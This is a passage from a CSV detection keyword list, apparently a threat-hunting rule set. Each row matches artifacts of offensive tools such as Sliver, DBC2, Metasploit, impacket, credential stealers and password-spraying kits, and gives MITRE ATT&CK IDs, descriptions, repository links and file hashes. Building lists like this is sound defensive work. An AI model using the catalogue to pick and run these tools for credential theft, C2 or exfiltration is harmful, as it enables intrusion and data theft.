posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Data\VulnerableCOM.csv*",".{0,1000}Data\\VulnerableCOM\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*database/c2.db*",".{0,1000}database\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*DataBouncing-main.zip*",".{0,1000}DataBouncing\-main\.zip.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*DataSploit*",".{0,1000}DataSploit.{0,1000}","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","252","661","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" "*datr=80ZzUfKqDOjwL8pauwqMjHTa*",".{0,1000}datr\=80ZzUfKqDOjwL8pauwqMjHTa.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*DavidXanatos/DiskCryptor*",".{0,1000}DavidXanatos\/DiskCryptor.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*DavRelayUp.csproj*",".{0,1000}DavRelayUp\.csproj.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in 
domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp.exe*",".{0,1000}DavRelayUp\.exe.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp.sln*",".{0,1000}DavRelayUp\.sln.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp-master*",".{0,1000}DavRelayUp\-master.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*Daybr4ak/C2ReverseProxy*",".{0,1000}Daybr4ak\/C2ReverseProxy.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" 
"*dazzleUP.cna*",".{0,1000}dazzleUP\.cna.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.exe*",".{0,1000}dazzleUP\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.sln*",".{0,1000}dazzleUP\.sln.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.vcxproj*",".{0,1000}dazzleUP\.vcxproj.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.x32.exe*",".{0,1000}dazzleUP\.x32\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 
- T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.x64.exe*",".{0,1000}dazzleUP\.x64\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP_Reflective_DLL*",".{0,1000}dazzleUP_Reflective_DLL.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP-master*",".{0,1000}dazzleUP\-master.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e*",".{0,1000}db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 
"*db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363*",".{0,1000}db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93*",".{0,1000}db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676*",".{0,1000}db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895*",".{0,1000}db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db2_default_pass.txt*",".{0,1000}db2_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*db2_default_user.txt*",".{0,1000}db2_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DB234158-233E-4EC4-A2CE-EF02699563A2*",".{0,1000}DB234158\-233E\-4EC4\-A2CE\-EF02699563A2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354*",".{0,1000}db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9*",".{0,1000}db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd*",".{0,1000}db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62*",".{0,1000}db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e*",".{0,1000}db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c*",".{0,1000}db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15*",".{0,1000}db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*DB8A345D-E19C-4C2A-9FDF-16BF4DD03717*",".{0,1000}DB8A345D\-E19C\-4C2A\-9FDF\-16BF4DD03717.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40*",".{0,1000}db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560*",".{0,1000}db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A*",".{0,1000}DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" 
"*dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91*",".{0,1000}dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","file_hash","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b*",".{0,1000}dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*DBC2.git*",".{0,1000}DBC2\.git.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.cs*",".{0,1000}dbc2_agent\.cs.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.exe*",".{0,1000}dbc2_agent\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.dll*",".{0,1000}dbc2Loader\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.exe*",".{0,1000}dbc2Loader\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.tpl*",".{0,1000}dbc2Loader\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR.*",".{0,1000}dbc2LoaderWrapperCLR\..{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x64.dll*",".{0,1000}dbc2LoaderWrapperCLR_x64\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x86.dll*",".{0,1000}dbc2LoaderWrapperCLR_x86\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*DBC2-master.zip*",".{0,1000}DBC2\-master\.zip.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - 
T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}dBCSPwd.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596*",".{0,1000}dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 